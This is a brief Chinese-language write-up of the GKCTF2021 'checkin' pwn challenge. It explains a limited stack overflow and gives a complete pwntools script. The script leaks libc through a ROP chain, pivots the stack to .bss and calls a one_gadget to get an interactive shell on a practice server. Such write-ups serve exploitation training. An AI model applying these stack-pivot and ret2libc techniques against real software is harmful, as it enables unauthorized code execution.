GKCTF2021_checkin
查看保护
简单题
有一个溢出,只能溢出到rbp所以肯定栈迁移直接打。有一个小坑点就是0x20这个read,最后一个gadget不能选用puts_plt + main_addr,因为0x20不够,所以选择下面这个gadget即可,可以泄露libc又可以继续执行vuln函数
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 28952)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000401ab3
puts_addr = 0x4018B5
p1 = b'admin\x00\x00\x00'
p1 += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_addr)
r.recvuntil('>')
r.send(p1)
bss_addr = 0x602400
p2 = b'admin\x00\x00\x00'
p2 += p64(0) * 3 + p64(bss_addr)
r.recvuntil('>')
r.send(p2)
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('[+] puts_addr = ' + hex(puts_addr))
libc = ELF('./libc.so.6')
libc_base = puts_addr - libc.sym['puts']
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[2] + libc_base
p3 = b'admin\x00\x00\x00' * 3
p3 += p64(one_gadget)
r.recvuntil('>')
r.send(p3)
p4 = b'admin\x00\x00\x00' * 4
p4 += p64(bss_addr)
r.recvuntil('>')
r.send(p4)
r.interactive()